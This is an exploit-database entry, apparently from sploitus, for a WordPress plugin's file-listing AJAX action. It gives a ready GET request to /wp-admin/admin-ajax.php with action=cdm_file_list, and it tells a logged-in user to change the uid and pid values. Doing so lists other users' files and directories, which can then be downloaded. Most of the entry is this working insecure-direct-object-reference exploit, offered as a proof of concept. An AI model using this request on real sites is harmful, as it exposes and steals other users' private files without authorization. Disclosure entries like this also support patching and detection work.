## https://sploitus.com/exploit?id=WPEX-ID:D14BB16E-CE1D-4C31-8791-BC63174897C0
As a logged in user, send a GET request:
GET /wp-admin/admin-ajax.php?action=cdm_file_list&uid=3(CHANGE HERE)&pid=0(CHANGE HERE)&search=&_=1708406394720
You can view files and directories owned by other users by manipulating the `uid` and `pid` parameters
That information can then be leveraged to download the files.